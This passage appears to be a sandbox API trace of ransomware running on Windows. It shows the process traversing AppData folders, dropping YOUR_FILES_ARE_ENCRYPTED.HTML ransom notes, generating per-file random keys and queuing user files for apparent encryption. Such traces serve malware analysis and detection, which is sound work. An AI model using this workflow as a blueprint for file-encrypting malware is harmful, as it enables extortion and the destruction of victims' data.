ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.204] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\fwlink[1]") returned 78 [0159.204] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.204] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.204] lstrlenW (lpString="") returned 0 [0159.204] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.204] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.204] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.207] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\gxo2h2pj\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.207] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.209] CloseHandle (hObject=0x5a8) returned 1 [0159.210] GetProcessHeap () returned 0x270000 [0159.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.276] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab7b8200, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 1 [0159.276] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 69 [0159.276] lstrcmpW (lpString1="index.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.276] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0159.276] lstrlenW (lpString=".dat") returned 4 [0159.276] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0159.276] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0159.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0159.276] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab7b8200, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 0 [0159.276] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.282] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0159.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.284] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.286] CloseHandle (hObject=0x4a8) returned 1 [0159.286] GetProcessHeap () returned 0x270000 [0159.287] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.288] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="FORMS", cAlternateFileName="")) returned 1 [0159.288] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS") returned 53 [0159.288] GetProcessHeap () returned 0x270000 [0159.288] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.288] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS" [0159.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\*" [0159.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.289] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.289] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4862a00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 1 [0159.289] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 66 [0159.289] lstrcmpW (lpString1="FRMCACHE.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.289] PathFindExtensionW (pszPath="FRMCACHE.DAT") returned=".DAT" [0159.289] lstrlenW (lpString=".DAT") returned 4 [0159.289] PathFindExtensionW (pszPath="FRMCACHE.DAT") returned=".DAT" [0159.289] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4862a00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 0 [0159.289] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.289] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0159.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\forms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.290] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.292] CloseHandle (hObject=0x4a8) returned 1 [0159.292] GetProcessHeap () returned 0x270000 [0159.293] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.293] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0159.293] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer") returned 65 [0159.293] GetProcessHeap () returned 0x270000 [0159.293] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.293] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer" [0159.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\*" [0159.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.294] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.294] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd6127ed0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6127ed0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad9e0a4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2f9d, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.bak", cAlternateFileName="")) returned 1 [0159.294] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 77 [0159.294] lstrcmpW (lpString1="brndlog.bak", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.294] PathFindExtensionW (pszPath="brndlog.bak") returned=".bak" [0159.294] lstrlenW (lpString=".bak") returned 4 [0159.294] PathFindExtensionW (pszPath="brndlog.bak") returned=".bak" [0159.294] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0159.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0159.294] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=12189) returned 1 [0159.294] GetProcessHeap () returned 0x270000 [0159.294] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.298] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="C1") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="F0") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B1") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="28") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="34") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="5E") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="02") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="4A") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="6D") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="B3") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="4C") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="05") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="1B") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="E9") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="56") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="4C") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="0A") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="AE") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="CE") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="BB") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="B2") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="4C") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="A7") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="5F") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="7D") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="2D") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="96") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="10") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="32") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="DC") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="ED") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="51") returned 2 [0159.299] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" [0159.299] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.299] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.299] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6232870, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x2f9a, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0159.299] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 77 [0159.300] lstrcmpW (lpString1="brndlog.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.300] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0159.300] lstrlenW (lpString=".txt") returned 4 [0159.300] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0159.300] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0159.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.301] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=12186) returned 1 [0159.301] GetProcessHeap () returned 0x270000 [0159.301] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0159.306] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="5E") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="97") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B4") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="FB") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="87") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="31") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="9F") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="08") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="11") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="FB") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="25") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="90") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="1C") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="C2") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="15") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="AC") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="07") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="45") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="98") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="9D") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="DA") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="3D") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="04") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="F5") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="78") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="72") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="F9") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="55") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="2B") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="20") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="17") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="3E") returned 2 [0159.307] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" [0159.307] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.308] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0159.308] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recovery", cAlternateFileName="")) returned 1 [0159.308] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned 74 [0159.308] GetProcessHeap () returned 0x270000 [0159.308] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x744a1c0 [0159.308] lstrcpyW (in: lpString1=0x744a1c0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet 